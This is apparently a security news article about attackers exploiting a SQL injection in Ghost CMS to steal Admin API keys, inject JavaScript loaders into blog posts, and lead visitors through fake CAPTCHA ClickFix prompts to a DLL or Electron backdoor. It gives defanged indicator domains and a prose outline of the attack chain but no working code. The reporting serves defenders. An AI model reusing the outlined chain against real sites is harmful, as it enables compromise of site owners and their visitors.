Threat actors are actively exploiting a critical security vulnerability within the Ghost Content Management System (CMS), leveraging it to inject malicious JavaScript code and facilitate ClickFix attacks. This recent surge in malicious activity targets users of the popular open-source blogging platform, highlighting the persistent threat of web security compromises.
The exploitation centers around CVE-2026-26980, an SQL injection flaw in Ghost’s Content API that carries a CVSS score of 9.4. This severe vulnerability, patched in version 6.19.1 in February 2026, allows unauthenticated attackers to access sensitive database information. Discovered by Anthropic researchers using their AI model Claude, the flaw’s true danger lies in its ability to grant unauthorized access to a site’s Admin API key.
Ghost CMS Vulnerability Fuels Widespread ClickFix Attacks
The compromised Admin API key provides attackers with the capability to directly modify published articles and inject harmful code, as detailed by security vendor QiAnXin XLab. In a significant “poisoning” campaign, threat actors have been observed obtaining these keys without permission and subsequently using the Ghost Admin API to perform bulk article tampering. Malicious JavaScript loaders are being inserted at the footer of web pages to support what are known as ClickFix attacks.
This campaign appears to involve at least two distinct threat clusters. Security researchers first detected the malicious activity on May 7, 2026. The attacks have already impacted over 700 websites across diverse sectors, including higher education, blockchain technology, artificial intelligence, software-as-a-service (SaaS), security research, media, and financial technology. The breach of legitimate websites could potentially increase the success rate of subsequent ClickFix attack vectors.
The injected JavaScript functions as a two-stage loader. Its primary role is to fetch the main payload from an external domain, specifically “clo4shara[.]xyz/11z77u3.php,” at runtime. This modular architecture allows attackers to easily swap payloads across different compromised sites while maintaining the loader’s core functionality.
Attack Chain and Payload Delivery
According to XLab, direct access to “clo4shara[.]xyz/11z77u3.php” reveals a traffic distribution script. This script collects browser fingerprinting information from visitors and uploads it to the server. Based on instructions received back from the server, the script then initiates actions such as redirection, pop-up windows, or file downloads. This PHP script is reportedly powered by Adspect, a commercial cloaking service designed to hide malicious activity from security scanners and crawlers.
The cloaking script ensures that only targeted genuine users receive the actual malicious payload, while automated tools encounter a seemingly benign webpage. The script supports 19 different commands, enabling the execution of arbitrary JavaScript code and remote control over the victim’s browser.
Users identified as targets are presented with a fake CAPTCHA verification page within an iframe. To proceed, they are instructed to copy and paste a Base64-encoded command into the Windows Run dialog. This command acts as a dropper, initiating the download and extraction of a ZIP archive. This archive contains a Windows batch script which, in turn, executes a PowerShell command to download a DLL file from a remote domain.
The DLL is then launched using “rundll32.exe,” and a deceptive webpage is opened to distract the user. In some observed instances, subsequent iterations of the malware have replaced the DLL with a JavaScript payload. Regardless of the delivery method, the ultimate objective is to install a Windows executable. In the case of the DLL, this executable is a PuTTY client with a valid code-signing certificate. When delivered via JavaScript, the payload is an Inno Setup installer for an Electron application.
This Electron application is a modified version of the open-source Grape desktop client. Its design focuses on establishing persistence and periodically polling a remote server, identified as “web-telegram[.]ug,” every 30 seconds. This allows attackers to issue instructions, including the execution of JavaScript code or other executable files.
To mitigate these risks, Ghost CMS users are strongly advised to upgrade their installations to the latest version. Additionally, rotating all access credentials, thoroughly cleaning compromised websites, and auditing access logs for any suspicious activity are crucial steps. Organizations should also consider notifying users who may have visited affected sites during the contamination period about the potential risk of compromise.
The ongoing exploitation of the Ghost CMS vulnerability highlights the importance of timely patching and robust security practices for all web platforms. The future trajectory of this campaign will likely depend on the attackers’ ability to adapt their payload delivery mechanisms and maintain access to their command-and-control infrastructure, while defenders work to identify and remediate further compromises.